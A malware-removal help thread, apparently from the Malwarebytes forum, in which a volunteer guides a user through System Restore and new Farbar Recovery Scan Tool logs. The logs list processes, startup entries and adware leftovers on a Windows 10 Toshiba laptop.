2016-02-10 14:18 - 2015-07-10 05:55 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-02-10 14:17 - 2013-08-07 12:46 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-02-10 14:01 - 2013-05-27 17:31 - 146614896 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-02-07 21:40 - 2010-08-30 21:35 - 00010240 _____ C:\Users\Lexi\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
 
==================== Files in the root of some directories =======
 
2016-01-28 17:15 - 2016-01-28 17:15 - 0000047 _____ () C:\Users\Lexi\AppData\Roaming\WB.CFG
2011-03-24 12:02 - 2015-12-07 21:16 - 0000618 _____ () C:\Users\Lexi\AppData\Roaming\wklnhst.dat
2010-08-30 21:35 - 2016-02-07 21:40 - 0010240 _____ () C:\Users\Lexi\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2011-09-30 18:11 - 2011-09-30 18:11 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00024cb8).exe
2011-12-24 15:45 - 2011-12-24 15:45 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(000321b2).exe
2012-01-25 15:47 - 2012-01-25 15:47 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00034114).exe
2011-11-01 21:04 - 2011-11-01 21:04 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(0003ec41).exe
2011-10-16 11:32 - 2011-10-16 11:32 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00056cd5).exe
2011-08-13 08:55 - 2011-08-13 08:55 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00073fec).exe
2012-01-26 18:05 - 2012-01-26 18:05 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(0008252c).exe
2011-09-19 14:57 - 2011-09-19 14:57 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(0008496e).exe
2011-10-15 12:37 - 2011-10-15 12:37 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(000b8b3e).exe
2011-09-21 21:26 - 2011-09-21 21:26 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(000c73a9).exe
2011-11-10 10:20 - 2011-11-10 10:20 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00130f9a).exe
2011-08-08 18:26 - 2011-08-08 18:26 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(0018976e).exe
2011-10-20 12:37 - 2011-10-20 12:37 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00288d51).exe
2012-01-11 16:26 - 2012-01-11 16:26 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(008db6d3).exe
2011-12-20 17:09 - 2011-12-20 17:09 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(00fc1d83).exe
2011-09-14 17:15 - 2011-09-14 17:15 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(013e5cf4).exe
2011-12-20 02:23 - 2011-12-20 02:23 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(01fc745e).exe
2011-09-11 09:14 - 2011-09-11 09:14 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(026211c7).exe
2011-08-09 13:53 - 2011-08-09 13:53 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(04456972).exe
2011-08-25 12:37 - 2011-08-25 12:37 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(054287ef).exe
2011-09-01 10:44 - 2011-09-01 10:44 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(0827ae62).exe
2011-10-02 17:23 - 2011-10-02 17:23 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(0a233f94).exe
2011-12-27 20:18 - 2011-12-27 20:18 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(106fb87b).exe
2011-08-28 06:05 - 2011-08-28 06:05 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(134e6ebe).exe
2012-01-24 15:20 - 2012-01-24 15:20 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(13f4b968).exe
2012-01-30 16:56 - 2012-01-30 16:56 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(1462a399).exe
2011-12-19 00:06 - 2011-12-19 00:06 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(1475ab09).exe
2011-08-17 09:36 - 2011-08-17 09:36 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(14c57403).exe
2011-11-15 19:36 - 2011-11-15 19:36 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(1bd14184).exe
2011-08-30 08:09 - 2011-08-30 08:09 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(1e0d189c).exe
2011-11-22 02:21 - 2011-11-22 02:21 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(1fa4da4d).exe
2011-12-31 02:31 - 2011-12-31 02:31 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(2138ca7d).exe
2012-01-18 10:47 - 2012-01-18 10:47 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(23633e70).exe
2012-01-20 11:14 - 2012-01-20 11:14 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(2dc97e34).exe
2011-08-23 22:07 - 2011-08-23 22:07 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(365b465f).exe
2011-10-11 17:07 - 2011-10-11 17:07 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(386da867).exe
2011-08-24 08:46 - 2011-08-24 08:46 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(38a4d5bf).exe
2011-11-26 23:50 - 2011-11-26 23:50 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(38da5692).exe
2011-11-28 06:12 - 2011-11-28 06:12 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(3f5e903a).exe
2011-10-13 15:47 - 2011-10-13 15:47 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(42715212).exe
2011-11-29 23:40 - 2011-11-29 23:40 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(48441ffa).exe
2012-01-08 22:18 - 2012-01-08 22:18 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(4eaa8c83).exe
2012-01-11 01:03 - 2012-01-11 01:03 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(598e1f87).exe
2011-12-03 12:09 - 2011-12-03 12:09 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(5a656a9f).exe
2011-12-05 16:58 - 2011-12-05 16:58 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(65babd0e).exe
2011-12-06 19:09 - 2011-12-06 19:09 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(6b589e26).exe
2011-12-14 21:46 - 2011-12-14 21:46 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(951b3e56).exe
2010-09-04 17:23 - 2010-10-02 09:49 - 0000000 _____ () C:\Users\Lexi\AppData\Local\Okaducenafi.bin
2010-09-04 17:23 - 2010-10-02 15:59 - 0000120 _____ () C:\Users\Lexi\AppData\Local\Vvoqitamewiga.dat
2014-08-29 14:20 - 2014-08-29 14:20 - 0000000 _____ () C:\Users\Lexi\AppData\Local\{56FEC2D8-8D9A-4EBB-8F41-2EA297B30509}
2011-01-22 13:59 - 2011-01-22 13:59 - 0000056 ____H () C:\ProgramData\ezsidmv.dat
2011-07-02 19:22 - 2011-07-02 19:22 - 0000188 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
 
Files to move or delete:
====================
C:\Users\Lexi\FileThisDesktopInstaller.exe
 
 
Some files in TEMP:
====================
C:\Users\Lexi\AppData\Local\Temp\Foxit Updater.exe
C:\Users\Lexi\AppData\Local\Temp\GLB1A2B.EXE
C:\Users\Lexi\AppData\Local\Temp\Runner.exe
C:\Users\Lexi\AppData\Local\Temp\sqlite-3.7.2-sqlitejdbc.dll
C:\Users\Lexi\AppData\Local\Temp\_is9FE4.exe
 
 
==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2016-03-07 13:33
 
==================== End of FRST.txt ============================
 

malwarfirsttime.txt

sfcdetails.txt

Addition.txt


Hello and welcome to Malwarebytes,

Please be aware the following P2P/Piracy Warning is a standard opening reply made here at Malwarebytes, we make no accusations but do make you aware of Forum Protocol....

If you're using Peer 2 Peer software such as uTorrent, BitTorrent or similar you must either fully uninstall them or completely disable them from running while being assisted here. Failure to remove or disable such software will result in your topic being closed and no further assistance being provided. If you have illegal/cracked software, cracks, keygens etc. on the system, please remove or uninstall them now and read the policy on Piracy.


Anyone other than the original starter of this thread please DO NOT follow the instructions and advice posted as replies here, my help and advice is NOT related to your system and will probably cause more harm than good...
 

I doubt very much that Malwarebytes has damaged your system, as a tool it will not remove or alter any system files. Your system is definitely still infected, as some mentioned services are not working I'd like you to run System Restore before we go any further..

 

Go to this link: http://www.tenforums.com/tutorials/4588-system-restore-windows-10-a.html Use Option two and restore back to a previous date. FRST has listed restore points that have been found, use the date I've listed in red...

 

==================== Restore Points =========================

26-02-2016 16:51:34 Scheduled Checkpoint
03-03-2016 23:14:19 Removed Storia.
07-03-2016 12:51:40 Restore Operation

 

When that is completed and the system has rebooted run FRST again and post the two fresh logs....

 

Run FRST one more time, ensure all boxes are checkmarked under "Whitelist" but only Addition.txt under "Optional scan" Select scan, when done post the new logs....

 

Thanks,

 

Kevin....
 


Thank you so much for your help.  I am sorry for the long wait.  I ran FRST again and this time I only got one log:

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01
Ran by Lexi (administrator) on DURABLE (08-03-2016 22:48:09)
Running from C:\Users\Lexi\Downloads
Loaded Profiles: Lexi (Available Profiles: Lexi & DefaultAppPool)
Platform: Windows 10 Home (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Edge)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RTKAUDIOSERVICE64.EXE
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Apple Inc.) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
() C:\Program Files (x86)\Fast Free Converter\FastFreeConverterUpdt.exe
(Symantec Corporation) C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.3.198\ccSvcHst.exe
(LeapFrog Enterprises, Inc.) C:\Program Files (x86)\LeapFrog\LeapFrog Connect\CommandService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(TOSHIBA Corporation) C:\Windows\System32\TODDSrv.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(TOSHIBA Corporation) C:\Windows\System32\ThpSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\TecoService.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Symantec Corporation) C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.3.198\ccSvcHst.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler64.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(TOSHIBA Corporation) C:\Windows\System32\ThpSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TPwrMain.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\SmoothView\SmoothView.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\Teco.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\SmartFaceV\SmartFaceVWatcher.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\BulletinBoard\TosNcCore.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\ReelTime\TosReelTimeMonitor.exe
() C:\Program Files\TOSHIBA\FlashCards\Hotkey\TCrdKBB.exe
(Intel Corporation) C:\Windows\System32\igfxext.exe
(PFU LIMITED) C:\Program Files (x86)\PFU\ScanSnap\CardMinder\CardLauncher.exe
(Amazon Digital Services, LLC.) C:\Users\Lexi\AppData\Local\Apps\2.0\2DJ030TV.4OO\2H60B505.COR\amaz..tion_f2fa081ea2183235_0002.0001_cb34a912a946f839\AmazonCloudDrive.exe
(TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\Utilities\KeNotify.exe
(Evernote Corp., 305 Walnut Street, Redwood City, CA 94063) C:\Program Files (x86)\Evernote\Evernote\EvernoteClipper.exe
(LeapFrog Enterprises, Inc.) C:\Program Files (x86)\LeapFrog\LeapFrog Connect\Monitor.exe
(LG Electronics) C:\ProgramData\LGMOBILEAX\BYR_Client\VZWUAAgent.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TPHM\TPCHSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSENotify.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TPHM\TPCHWMsg.exe
(Sun Microsystems, Inc.) C:\Users\Lexi\AppData\Local\Apps\2.0\2DJ030TV.4OO\2H60B505.COR\amaz..tion_f2fa081ea2183235_0002.0001_cb34a912a946f839\LocalServiceJre\bin\AmazonCloudDriveW.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersServer.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\ActionUriServer.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
(Microsoft Corporation) C:\Windows\System32\browser_broker.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [16174328 2015-09-28] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1411840 2015-09-28] (Realtek Semiconductor)
HKLM\...\Run: [ThpSrv] => C:\windows\system32\thpsrv /logon
HKLM\...\Run: [TPwrMain] => C:\Program Files\TOSHIBA\Power Saver\TPwrMain.EXE [505696 2009-11-06] (TOSHIBA Corporation)
HKLM\...\Run: [HSON] => C:\Program Files\TOSHIBA\TBS\HSON.exe [52600 2009-03-09] (TOSHIBA Corporation)
HKLM\...\Run: [smoothView] => C:\Program Files\Toshiba\SmoothView\SmoothView.exe [508216 2009-07-28] (TOSHIBA Corporation)
HKLM\...\Run: [00TCrdMain] => C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe [913720 2010-03-25] (TOSHIBA Corporation)
HKLM\...\Run: [Teco] => C:\Program Files\TOSHIBA\TECO\Teco.exe [1489760 2010-04-06] (TOSHIBA Corporation)
HKLM\...\Run: [TosWaitSrv] => C:\Program Files\TOSHIBA\TPHM\TosWaitSrv.exe [705368 2010-02-23] (TOSHIBA Corporation)
HKLM\...\Run: [smartFaceVWatcher] => C:\Program Files\Toshiba\SmartFaceV\SmartFaceVWatcher.exe [238080 2009-10-19] (TOSHIBA Corporation)
HKLM\...\Run: [TosVolRegulator] => C:\Program Files\TOSHIBA\TosVolRegulator\TosVolRegulator.exe [24376 2009-11-11] (TOSHIBA Corporation)
HKLM\...\Run: [TosSENotify] => C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosWaitSrv.exe [709976 2010-02-05] (TOSHIBA Corporation)
HKLM\...\Run: [TosNC] => C:\Program Files\Toshiba\BulletinBoard\TosNcCore.exe [595816 2010-03-19] (TOSHIBA Corporation)
HKLM\...\Run: [TosReelTimeMonitor] => C:\Program Files\TOSHIBA\ReelTime\TosReelTimeMonitor.exe [35672 2010-03-03] (TOSHIBA Corporation)
HKLM\...\Run: [synTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3944648 2015-06-12] (Synaptics Incorporated)
HKLM-x32\...\Run: [KeNotify] => C:\Program Files (x86)\TOSHIBA\Utilities\KeNotify.exe [34160 2009-12-25] (TOSHIBA CORPORATION)
HKLM-x32\...\Run: [HWSetup] => C:\Program Files\TOSHIBA\Utilities\HWSetup.exe [423936 2010-03-04] (TOSHIBA Electronics, Inc.)
HKLM-x32\...\Run: [sVPWUTIL] => C:\Program Files (x86)\TOSHIBA\Utilities\SVPWUTIL.exe [352256 2010-02-22] (TOSHIBA CORPORATION)
HKLM-x32\...\Run: [TWebCamera] => C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCamera.exe [2454840 2010-02-24] (TOSHIBA CORPORATION.)
HKLM-x32\...\Run: [TSleepSrv] => C:\Program Files (x86)\TOSHIBA\TOSHIBA Sleep Utility\TSleepSrv.exe [252728 2010-03-17] (TOSHIBA)
HKLM-x32\...\Run: [NortonOnlineBackupReminder] => C:\Program Files (x86)\TOSHIBA\Toshiba Online Backup\Activation\TobuActivation.exe [529256 2009-08-10] (Toshiba)
HKLM-x32\...\Run: [secure Online Account Numbers] => C:\Program Files (x86)\Discover\SOAN\DiscoverSOAN.exe [376832 2010-03-05] (Orbiscom Ltd. All rights reserved.)
HKLM-x32\...\Run: [brMfcWnd] => C:\Program Files (x86)\Brother\Brmfcmon\BrMfcWnd.exe [1159168 2009-05-26] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [ControlCenter3] => C:\Program Files (x86)\Brother\ControlCenter3\brctrcen.exe [114688 2008-12-24] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [scanSnap WIA Service Checker] => C:\windows\SSDriver\fi5110\SsWiaChecker.exe
HKLM-x32\...\Run: [Monitor] => C:\Program Files (x86)\LeapFrog\LeapFrog Connect\Monitor.exe [118272 2014-07-11] (LeapFrog Enterprises, Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2011-07-05] (Apple Inc.)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [421736 2011-08-19] (Apple Inc.)
HKLM-x32\...\Run: [bYRUA_AGENT] => C:\ProgramData\LGMOBILEAX\BYR_Client\VZWUAAgent.exe [380024 2012-09-24] (LG Electronics)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1085656 2015-12-13] (Adobe Systems Incorporated)
Winlogon\Notify\igfxcui: C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)
HKLM\...\Policies\Explorer: [NoSetActiveDesktop] 0
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Run: [GoogleChromeAutoLaunch_AC2BF96DE3E4AFDBE25411FD527B2AD1] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [746648 2016-02-17] (Google Inc.)
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Run: [FileThis Fetch] => C:\Program Files (x86)\FileThis\FileThis Fetch\FileThis Fetch.exe [350208 2013-05-24] (FileThis)
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2010-05-28] (Google Inc.)
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Run: [skitch] => C:\Program Files (x86)\Evernote\Skitch\Skitch.exe [4304704 2013-08-09] (Evernote)
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Policies\Explorer: [NoSetActiveDesktop] 0
AppInit_DLLs: C:\PROGRA~2\SearchProtect\SearchProtect\bin\VC64Loader.dll => No File
ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} =>  No File
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Amazon Unbox.lnk [2012-12-12]
ShortcutTarget: Amazon Unbox.lnk -> C:\Program Files (x86)\Amazon\Amazon Unbox Video\ADVWindowsClientSystemTray.exe (Amazon.com)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Audible Download Manager.lnk [2010-09-24]
ShortcutTarget: Audible Download Manager.lnk -> C:\Program Files (x86)\Audible\Bin\AudibleDownloadHelper.exe (Audible, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\BodyMedia Sync.lnk [2013-01-17]
ShortcutTarget: BodyMedia Sync.lnk -> C:\Program Files (x86)\BodyMedia\Sync\BodyMediaSync.exe (BodyMedia, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CardMinder Viewer.lnk [2011-07-19]
ShortcutTarget: CardMinder Viewer.lnk -> C:\Program Files (x86)\PFU\ScanSnap\CardMinder\CardLauncher.exe (PFU LIMITED)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Conversion to PDF with ScanSnap Organizer.lnk [2011-07-19]
ShortcutTarget: Conversion to PDF with ScanSnap Organizer.lnk -> C:\Program Files (x86)\PFU\ScanSnap\Organizer\PfuSsOrgOcrChk.exe (PFU LIMITED)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ScanSnap Manager.lnk [2013-05-28]
ShortcutTarget: ScanSnap Manager.lnk -> C:\Program Files (x86)\PFU\ScanSnap\Driver\PfuSsMon.exe (PFU LIMITED)
Startup: C:\Users\Lexi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Amazon Cloud Drive.lnk [2016-03-08]
ShortcutTarget: Amazon Cloud Drive.lnk -> C:\Users\Lexi\AppData\Local\Apps\2.0\2DJ030TV.4OO\2H60B505.COR\amaz..tion_f2fa081ea2183235_0002.0001_cb34a912a946f839\AmazonCloudDrive.exe (Amazon Digital Services, LLC.)
Startup: C:\Users\Lexi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EvernoteClipper.lnk [2015-07-31]
ShortcutTarget: EvernoteClipper.lnk -> C:\Program Files (x86)\Evernote\Evernote\EvernoteClipper.exe (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{0377792b-7629-45e2-ae76-3047b41ccf06}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{69348f7a-a204-4307-bdbe-d51a41143651}: [DhcpNameServer] 10.0.5.3 10.0.5.2

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_freaudedtr_16_04&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDyByB0E0B0C0CyDtC0FtN0D0Tzu0StCyEzzzztN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StByE0E0E0C0E0E0EtGtC0CyD0FtGtDyEyEyCtGtByByDyEtGyEyEyB0FyD0B0FyByDyCyB0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0B0DzytD0DtDyEtG0F0E0ByEtGyE0AtD0AtGzy0FyEtCtGyC0Fzyzy0CzztDzytDyE0AtD2QtN0A0LzuyE%26cr%3D561344303%26a%3Dwncy_freaudedtr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_freaudedtr_16_04&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDyByB0E0B0C0CyDtC0FtN0D0Tzu0StCyEzzzztN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StByE0E0E0C0E0E0EtGtC0CyD0FtGtDyEyEyCtGtByByDyEtGyEyEyB0FyD0B0FyByDyCyB0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0B0DzytD0DtDyEtG0F0E0ByEtGyE0AtD0AtGzy0FyEtCtGyC0Fzyzy0CzztDzytDyE0AtD2QtN0A0LzuyE%26cr%3D561344303%26a%3Dwncy_freaudedtr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com/ig/redirectdomain?brand=TSNA&bmod=TSNA
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Start Page Restore = hxxp://www.google.com/calendar/render?hl=en&tab=wc&gsessionid=pOBMFiDq2Uvgtsn9Tik9KQ
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://www.facebook.com/
hxxps://www.google.com/calendar/render?hl=en&tab=wc&pli=1&gsessionid=OK
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://www.google.com/ie
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com/ie
